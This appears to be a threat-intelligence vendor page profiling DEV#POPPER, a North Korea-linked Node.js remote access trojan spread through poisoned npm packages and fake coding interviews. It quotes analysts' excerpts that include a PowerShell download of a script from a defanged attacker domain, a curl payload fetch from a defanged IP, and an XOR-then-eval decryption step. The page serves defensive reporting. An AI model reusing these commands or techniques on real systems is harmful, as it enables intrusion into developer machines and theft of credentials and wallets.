DEV#POPPER is a cross-platform Node.js remote access trojan targeting software developers on Windows, macOS, and Linux. It has been deployed in North Korea-linked operations associated with Contagious Interview and Famous Chollima, also known as Void Dokkaebi, including the PolinRider software supply-chain campaign. Delivery involves compromised open-source repositories and packages, malicious development-tool configurations, and repositories presented as coding tests during fraudulent job interviews.
The trojan establishes remote-control channels using Socket.IO over WebSocket, with HTTP supporting check-ins and data uploads. Its capabilities include executing JavaScript and shell commands, retrieving additional code, managing and uploading files, exfiltrating directories, collecting host information and process listings, and reading clipboard contents. Observed activity also includes credential, browser-data, and cryptocurrency-wallet information theft. Some variants support multiple simultaneous operators through independent command queues. DEV#POPPER has been delivered alongside OmniStealer, a separate information-stealing payload.
Persistence mechanisms modify developer applications, including Visual Studio Code, Cursor, Antigravity, GitHub Desktop, and the global npm command-line interface, as well as Discord desktop components. Variants also abuse Node.js module search-order hijacking. Heavily obfuscated JavaScript and checks that avoid selected CI/CD runners and sandbox environments hinder automated analysis and concentrate execution on developer workstations.
Associated multistage loaders retrieve encrypted payloads through TRON, Aptos, and BNB Smart Chain infrastructure, decrypt them, and execute them in-process or through detached Node.js processes. Blockchain-backed staging lets operators change payloads without republishing compromised packages. In compromised Joyfill npm beta releases, the implant executed when a package was imported rather than through installation lifecycle hooks, exposing development, testing, and build workflows that loaded the affected libraries.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The malware, including a variant of the DEV#POPPER remote access trojan, retrieves encrypted payloads from blockchain transactions, decrypts them, and executes them on infected systems.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Earlier this week, I read a Socket blog about two compromised Joyfill beta releases. Joyfill is a legitimate digital form and PDF automation platform, and the poisoned versions contain malware that deploys a remote-access trojan (RAT).
The attackers downloaded and executed the script through PowerShell ... cmd.exe /c “powershell iwr -outf g.py hxxp://de.ztec[.]store:8000/www/run.py”
First, browser cookies were targeted. The attackers opened up a command prompt session through the Python backdoor script and changed directory to the default installation directory of Google Chrome: cmd.exe /c ...
The final recovered code can collect host information, establish a Socket.IO remote-control channel, execute supplied JavaScript or shell commands
The final "clientCode" payload is heavily obfuscated...
The hidden portion of the JavaScript code is heavily obfuscated and makes use of several obfuscation techniques ... Base64 Encoding ... Dynamic function and variable names ... Concatenation and split strings ... Prototyping obfuscation.
Two npm beta releases in the @joyfill namespace contain an import-time JavaScript implant that resolves encrypted code through Tron, Aptos, and BNB Smart Chain transactions.
The resulting code is over 500 lines long and is designed to ... monitor user activity through keylogging and clipboard tracking.
This information includes ... Hostname Platform (OS name) ... username, unique ID.
The resulting code is over 500 lines long and is designed to ... monitor user activity through keylogging and clipboard tracking.
If this step fails, it queries an Aptos account as a fallback to fetch the BSC transaction and, from it, decrypt and extract the JavaScript code and execute it.
A socket.io channel gives the actor interactive command execution, file upload and download, and clipboard access.
It sends a Windows Chrome user agent and the header Sec-V: A9-0135-3 in a request to /$/boot . It XOR-decrypts the response using ThZG+0jfXE6VAGOJ and calls eval() on the result.
Another function (“rt”) manages the downloading of next-stage payloads ... using a carefully crafted curl command to download the file ... curl -Lo ... hxxp://67.203.123[.]171:1244/pdown
60 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named as a follow-on payload delivered by the PolinRider campaign through malicious code concealed in developer configuration files and other seemingly ordinary repository artifacts. The content does not describe its specific capabilities.
A malware family associated with malicious npm packages that deliver a Node.js remote access trojan. The recovered payloads use blockchain-based resolution and support remote control, execution of supplied JavaScript or shell commands, file upload, clipboard access, host reconnaissance, and modification of developer-tool files.
A Node.js remote-access trojan that establishes a Socket.IO remote-control channel, executes JavaScript or shell commands, uploads files, reads clipboard data, gathers host information, retrieves additional payloads, and persists by modifying developer-tool files such as VS Code-related modules, Discord Desktop, GitHub Desktop, and the global npm CLI.
A remote access trojan delivered via compromised Joyfill npm beta releases in a supply-chain incident.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.